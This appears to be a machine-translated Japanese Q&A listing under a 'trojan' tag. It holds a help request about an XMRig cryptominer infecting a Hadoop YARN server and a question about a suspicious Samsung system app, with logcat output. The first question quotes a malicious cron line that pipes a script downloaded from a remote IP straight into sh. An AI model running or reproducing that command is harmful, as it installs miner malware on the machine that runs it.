問題タブ [trojan]
For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.
amazon-ec2 - Yarn が XMrig マイナー トロイの木馬の影響を受ける
XMrig トロイの木馬に感染した HDP スタック ヤーン プロセッサ。kylo ex2 サンドボックスを使用しても、CPU を 100% 占有するこのトロイの木馬に感染します。
糸) CMD (wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1)
これは cron であり、yarn ユーザーによって実行され、生成されたファイルとサーバー上の負荷
ルートファイルを見つけようとしています。どんな助けでも大歓迎です
android - service.odtcfactory.sec.com.odtcfactoryservice は Android 7.0 で有効なシステム アプリですか?
私の Samsung Galaxy S6 電話では、[システム アプリを表示] をクリックすると、[設定] > [アプリ] に service.odtcfactory.sec.com.odtcfactoryservice が表示されます。しばらく前に、自分の電話がハッキングされた可能性があるのではないかと疑い始めました。接続すると、Phone\Android\data に service.odtcfactory.sec.com.odtcfactoryservice という名前のフォルダーがあり、侵入が発生した可能性がある頃に作成されました。行われました(後知恵で)。
このフォルダー内には、adb logcat 出力の文字列「odtc」を含む次の行と同じ Created および Modified 日時を持つ空のキャッシュ フォルダーがあります。
07-15 16:12:44.502 D/MountService(3663): getExternalStorageMountMode: 最終的な mountMode=1、uid: 1000、packageName: service.odtcfactory.sec.com.odtcfactoryservice
07-15 16:12:44.541 I/ActivityManager(3663 ): ブロードキャスト サービス用に proc 5087:service.odtcfactory.sec.com.odtcfactoryservice/1000 を開始し
ます。 seaapp_context_lookup: seinfo=platform, pkgname=service.odtcfactory.sec.com.odtcfactoryservice
07-15 16:12:44.608 I/ActivityManager( 3663): service.odtcfactory.sec.com.odtcfactoryservice の DSS とスケールは 1.0
07- 15 16:12:44.644 D/ODTCFactoryService:BatteryAlarmReceiver(5087): ACTION_POWER_CONNECTED を受信しました
07-15 16:12:44.648 W/ContextImpl( 5087): 資格のあるユーザーなしでシステム プロセスのメソッドを呼び出す: android.app.ContextImpl.sendBroadcast:906 android.content.ContextWrapper.sendBroadcast:452 android.content.ContextWrapper .sendBroadcast:452 service.odtcfactory.sec.com.odtcfactoryservice.odtcfactory.BatteryAlarmReceiver.onReceive:54 android.app.ActivityThread.handleReceiver:3309
07-15 16:12:45.067 I/ODTCFactoryService:AlarmReceiver(5087): アラーム受信
07 -15 16:12:45.071 D/ODTCFactoryService:AlarmReceiver(5087): 1800000 (ミリ秒) 後にアラームがスケジュールされ、セッション時間は 180000 (ミリ秒)
07-15 16:12:45.071 D/ODTCFactoryService:PowerMonitor(5087): sessionStartTime 1531696365071
07-15 16:12:45.073 W/ContextImpl( 5087): 資格のあるユーザーなしでシステム プロセスのメソッドを呼び出す: android.app.ContextImpl.startService:1403 android.content.ContextWrapper.startService:664 android.content.ContextWrapper .startService:664 service.odtcfactory.sec.com.odtcfactoryservice.odtcfactory.AlarmReceiver.onReceive:105 android.app.ActivityThread.handleReceiver:3309
07-15 16:12:45.078 D/ODTCFactoryService::LockscreenEncoderFactory(5087): LockscreenEncoderFactory がインスタンス化されました
07-15 16:12:45.094 D/ODTCFactoryService:ProcessLockManager(5087): ロックが解放されました
07-15 16:12:45.105 I/ActivityManager(3663): プロセス service.odtcfactory.sec.com.odtcfactoryservice (pid 5087) が死亡(54,1194)
このアプリを強制停止しましたが、再び起動します。また、今週 2 回電話を工場出荷時設定にリセットしましたが、アプリはまだそこにあります。最初の工場出荷時の状態にリセットした後、最新のシステム アップデートをインストールしたので、Android のバージョンは 7.0 です。
カーネル バージョン 3.10.61-13731302 2018 年 6 月 4 日
ビルド番号 NRD90M.G920W8VLU6DRF1
Android セキュリティ パッチ レベル 2018 年 6 月 1 日
このシステムアプリは正規のものですか? Google で検索してもあまり情報が見つからず、さらに疑わしくなりました。有効でない場合、どうすればアンインストールできますか? 次のコマンドを実行しようとしましたが、DELETE_FAILED_INTERNAL_ERROR が発生しました。
adb shell pm uninstall service.odtcfactory.sec.com.odtcfactoryservice
ログ ファイルには、reSIProcate サービスに関連する疑わしい活動が他にも見られます。次の行は一例ですが、私の電話がサーバーにメッセージを送信しているように見える類似の例が多数あります。
07-15 15:51:08.226 I/reSIProcate(3132): SipResp: 200 tid=68e64ae9ac9d2c9f cseq=29 REGISTER contact=xxxx@[2605:8d80:2:8c1c:d6a:ab6e:8708:44c4]:6100 / 29から(ワイヤー)